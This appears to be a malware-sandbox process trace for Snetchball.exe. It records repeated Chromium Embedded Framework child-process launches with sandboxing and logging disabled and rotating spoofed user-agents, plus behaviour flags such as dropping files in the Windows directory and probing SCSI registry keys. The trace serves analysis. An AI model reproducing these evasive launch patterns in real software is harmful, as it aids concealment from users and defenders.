C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3052 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:860⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3056 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:860⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:160⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"61⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"62⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2840 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:263⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:863⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:863⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 OPR/112.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3132 --field-trial-handle=2844,i,5593826838233693096,14758408762258796311,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:163⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"64⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"65⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2776 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:266⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3044 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:866⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3048 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:866⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:166⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3124 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:166⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/126.0.2592.86 Version/17.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4148 --field-trial-handle=2780,i,1189844114911796556,8217631741645457223,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:166⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"67⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"68⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:269⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:869⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:869⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=2788,i,18006892414119322156,11617608262050056264,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:169⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"70⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"71⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:272⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3048 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:872⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3052 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:872⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:172⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:172⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4128 --field-trial-handle=2800,i,11139322402583715646,4255296591057337747,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:172⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"73⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"74⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2780 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:275⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:875⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:875⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows 11; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3184 --field-trial-handle=2784,i,12800969876586663181,9837050739271468903,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:175⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"76⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"77⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:278⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2924 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:878⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:878⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3080 --field-trial-handle=2868,i,3273156435202784544,2230561303702420533,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:178⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"79⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"80⤵
- Drops file in Windows directory
